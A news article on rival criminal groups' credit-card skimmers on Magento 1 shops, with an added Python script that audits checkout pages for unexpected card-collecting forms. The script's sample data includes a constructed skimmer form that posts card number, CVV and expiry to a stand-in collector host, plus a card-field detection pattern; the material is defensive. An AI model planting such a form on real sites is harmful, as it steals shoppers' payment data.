The new method of attack builds on the Magento 1 campaign already known to be affecting large numbers of e-commerce sites. In late 2020, Malwarebytes identified numerous Magento 1 websites being hacked, largely because Adobe had recently decided to stop supporting the platform. Often they were injected with a credit card skimmer, which Malwarebytes found is being used to develop further exploits.
“While monitoring activities tied to this Magento 1 campaign, we identified an e-commerce shop that had been targeted twice by skimmers. This in itself is not unusual; multiple infections on the same site are common,” Jérôme Segura, head of threat intelligence at Malwarebytes, said. “However, this case was different. The threat actors devised a version of their script that is aware of sites already injected with a Magento 1 skimmer. That second skimmer will simply harvest credit card details from the already existing fake form injected by the previous attackers.”
Criminals in competition
The discovery of the secondary exploit is interesting as it sets criminal groups up against one another. In some of the examples found by Malwarebytes, threat actors place their own alternate version of the original skimmer on a site in the event of administrators removing the original malicious script.
Alternatively, the secondary skimmer may simply reflect that different code injections have different levels of access. In this case, the second group of criminals simply takes credentials from the first group’s fake forms.
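The mechanism described above, a second skimmer reading card data out of a fake form that a first skimmer had already injected, means a compromised checkout page ends up carrying more than one form that collects card details. A defender can catch that condition by auditing the rendered page for card-collecting forms that are not the shop's own. The following is an added example, not Malwarebytes' code or anything from the campaign; it assumes the operator maintains an allowlist of legitimate payment form ids, and the sample pages, form ids, field names and the collection URL are all constructed for illustration.

```python
"""Audit a rendered checkout page for unexpected card-collecting forms.

Added example (not from the original article). Assumption: the shop
operator knows which form ids legitimately collect card data and wants
every other form carrying card-number-like fields reported, along with
the case where more than one form on the page collects card data.
"""
import re
from html.parser import HTMLParser

# Attribute values that typically mark a card-number / CVV / expiry field.
CARD_FIELD = re.compile(
    r"(cc[-_]?(number|num|exp|csc)|card[-_]?(number|num)|cvv|cvc|expir)", re.I
)


class FormScanner(HTMLParser):
    """Collect every <form> and the input/select fields inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []        # each entry: {"id", "action", "inputs"}
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "id": a.get("id") or a.get("name") or "(anonymous)",
                "action": a.get("action") or "",
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag in ("input", "select") and self._current is not None:
            self._current["inputs"].append(
                {k: a.get(k) or "" for k in ("name", "id", "autocomplete", "placeholder")}
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def is_card_input(field):
    """True if any attribute of the field looks like a card-data marker."""
    return any(CARD_FIELD.search(v) for v in field.values() if v)


def find_card_forms(html):
    """Return the forms on the page that contain at least one card field."""
    scanner = FormScanner()
    scanner.feed(html)
    return [f for f in scanner.forms if any(is_card_input(i) for i in f["inputs"])]


def audit(html, allowed_form_ids):
    """Report card-collecting forms outside the allowlist and duplicate card forms."""
    card_forms = find_card_forms(html)
    findings = []
    for form in card_forms:
        if form["id"] not in allowed_form_ids:
            target = form["action"] or "(same page)"
            findings.append(f"unexpected card form '{form['id']}' posting to {target}")
    if len(card_forms) > 1:
        findings.append(f"{len(card_forms)} forms collect card data; expected at most one")
    return findings


# Constructed sample pages: a clean checkout, and the same checkout with an
# injected fake payment form of the kind a skimmer adds.
CLEAN_PAGE = """
<form id="co-payment-form" action="/checkout/onepage/savePayment" method="post">
  <input name="email" placeholder="Email">
  <input name="cc-number" autocomplete="cc-number">
  <input name="cc-exp" autocomplete="cc-exp">
  <input name="cc-csc" autocomplete="cc-csc">
</form>
"""

INJECTED_PAGE = CLEAN_PAGE + """
<!-- constructed: fake form injected by a skimmer -->
<form id="pay_form" action="https://collector.example/gate" method="post">
  <input name="cc_number" placeholder="Card number">
  <input name="cvv" placeholder="CVV">
  <input name="exp_date" placeholder="MM/YY">
</form>
"""

if __name__ == "__main__":
    for finding in audit(INJECTED_PAGE, {"co-payment-form"}):
        print(finding)
```

The allowlist keeps the legitimate Magento payment form quiet; any other form that carries card-like fields is reported together with where it posts, and a second card form on the same page is flagged on its own, since that is exactly the layered-skimmer situation the article describes. Run as a periodic check against the served HTML (or against the DOM captured after scripts run, since many skimmers inject the form client-side).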
Malwarebytes has informed the relevant e-commerce sites when it has discovered credit card skimmers in place. E-commerce sites are advised to install the latest web protection software to prevent cybercriminals from implementing these types of exploits.
Given that credit card details are one of the most valuable pieces of information that can be stolen from a site, it is hardly surprising that threat actors are starting to compete with one another for victims’ credentials.